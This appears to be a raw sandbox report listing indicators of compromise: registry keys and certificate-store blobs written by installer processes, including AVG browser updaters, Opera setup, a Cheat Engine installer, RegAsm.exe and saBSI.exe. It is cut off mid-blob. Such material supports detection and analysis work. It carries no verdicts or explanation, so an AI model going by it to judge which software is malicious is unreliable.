installer.exeAVGBrowserUpdate.exeAVGBrowserUpdateComRegisterShell64.exeAVGBrowserUpdate.exeAVGBrowserUpdateComRegisterShell64.exeAVGBrowserUpdateComRegisterShell64.exeexplorer.exesetup.exeopera.exeAVGBrowserUpdate.exeCheatEngine75.tmpopera.exeopera.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.opdownload\OpenWithProgIDs installer.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Applications\opera.exe\shell\open installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{30612A81-C10F-498E-9163-C2B2A3F81A14}\ = "Google Update Legacy On Demand" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8C50E3A4-12A8-41FB-9941-E8EEB222E07E}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C0BE1521-7935-42E6-B606-058A559910BA}\NumMethods AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E3700FAF-2DC2-4322-99B1-D6A51203AF77}\ = "IMiscUtils" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B02B2F29-8637-4B78-892A-CFD7CCE793EC} AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E21E991-301D-47FD-AB7A-99FBE864EF65}\ = "IApp" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E21E991-301D-47FD-AB7A-99FBE864EF65}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{804EC8ED-BF49-41ED-BCD0-CA1D716D3E98}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.svg\OpenWithProgIds\AvgHTML setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.Update3WebSvc\CLSID AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A012A499-D8A6-4F6C-9E05-B02D58E3781A}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B80EC6B9-55FF-4E4F-B4E8-9BD098DBBAA5}\ProgID AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{40C1C1D3-AAEA-46EE-AA2B-79A2CC62F257}\ = "goopdate CredentialDialog" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\Software\Classes\AvgHTML\shell\open\command setup.exe Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff opera.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{67F69D86-C3AA-4CBF-A536-C73B5D785FFC}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5CCD3788-C8CC-4EE9-8DF7-944B7D9674F2}\NumMethods\ = "10" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C32E10AE-6600-4A1E-8BEA-EF89A3072F93}\NumMethods\ = "17" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0C0BAA6C-52FD-4A3F-8731-F588C5E8F191}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C7B73E65-20BA-407F-8A89-DF649EF82559} AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{358EC846-617A-4763-8656-50BF6E0E8AA2}\1.0\0 setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C32E10AE-6600-4A1E-8BEA-EF89A3072F93}\ = "IAppWeb" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9E6B2FC-34C6-435F-BC66-1EA330DB1270}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6CEBE594-0680-4815-86E1-615A6BE65E0E}\ = "IJobObserver2" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B02B2F29-8637-4B78-892A-CFD7CCE793EC} AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.ProcessLauncher.1.0\CLSID\ = "{E37D9308-A3C0-4EC3-87C5-222235C974E3}" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E21E991-301D-47FD-AB7A-99FBE864EF65} AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{384098DD-AB6D-412E-B819-2F10032D9767}\VersionIndependentProgID AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7BA03866-1403-40EA-81A9-23FCD97810E2}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{925547A3-663F-4673-A7B7-3FCACCDC4879}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{45F7CBA5-258D-4852-AD0A-B18F3FB214F4}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{28E08968-59C8-4A77-BEBA-12C9394AE077}\InprocServer32\ThreadingModel = "Apartment" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\shell CheatEngine75.tmp Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" opera.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DD8E03F-6BE1-41E2-B931-A37C7D1C0317}\ = "ICredentialDialog" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7E22D0ED-B403-44D2-BABF-4DDD0DFCA692}\VersionIndependentProgID\ = "AVGUpdate.MiscUtils" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E37D9308-A3C0-4EC3-87C5-222235C974E3}\LocalServer32\ = "\"C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6\\AVGBrowserUpdateOnDemand.exe\"" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\Software\Classes\.xht\OpenWithProgids setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{079CAB07-5001-4E71-9D5A-B412842E5178}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C7B73E65-20BA-407F-8A89-DF649EF82559}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8C7E81D6-0463-485E-8DF5-2ADAD81FAF40}\NumMethods\ = "8" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{925547A3-663F-4673-A7B7-3FCACCDC4879}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.ProcessLauncher\CLSID\ = "{E37D9308-A3C0-4EC3-87C5-222235C974E3}" AVGBrowserUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23AE0B95-20F3-4632-A2AE-C3D706E1D5D9}\Elevation\Enabled = "1" AVGBrowserUpdate.exe Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0400000000000000020000000300000001000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{30612A81-C10F-498E-9163-C2B2A3F81A14}\ProgID\ = "AVGUpdate.OnDemandCOMClassSvc.1.0" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DD8E03F-6BE1-41E2-B931-A37C7D1C0317} AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}\InProcServer32 AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{384098DD-AB6D-412E-B819-2F10032D9767}\ProgID\ = "AVGUpdate.CoreClass.1" AVGBrowserUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A27F7BCA-118B-4330-9B07-9092E8F047E2} AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A27F7BCA-118B-4330-9B07-9092E8F047E2}\InprocHandler32\ = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6\\psmachine_64.dll" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{079CAB07-5001-4E71-9D5A-B412842E5178}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{67F69D86-C3AA-4CBF-A536-C73B5D785FFC}\ = "IProcessLauncher" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FBDC15B-BBCD-402B-A45F-1853B01A9E3C}\LocalServer32 AVGBrowserUpdate.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.xht\OpenWithProgIDs installer.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 opera.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{384098DD-AB6D-412E-B819-2F10032D9767}\AppID = "{30612A81-C10F-498E-9163-C2B2A3F81A14}" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A708F91-06A3-409E-83BC-4A5CF10C8025}\ = "IAppVersionWeb" AVGBrowserUpdateComRegisterShell64.exe -
Processes:
RegAsm.exesaBSI.exeOperaGXSetup.exeAFK Journey.exersEngineSvc.exeGoogle chrome.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a OperaGXSetup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 AFK Journey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 0f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e0b00000001000000800000004d006900630072006f0073006f006600740020004900640065006e007400690074007900200056006500720069006600690063006100740069006f006e00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000320030003200300000006200000001000000200000005367f20c7ade0e2bca790915056d086b720c33c1fa2a2661acf787e3292e1270090000000100000016000000301406082b0601050507030306082b06010505070308140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a21d0000000100000010000000e78921f81cea4d4105d2b5f4afae0c78030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa22000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 rsEngineSvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 OperaGXSetup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 Google chrome.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f Google chrome.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da2097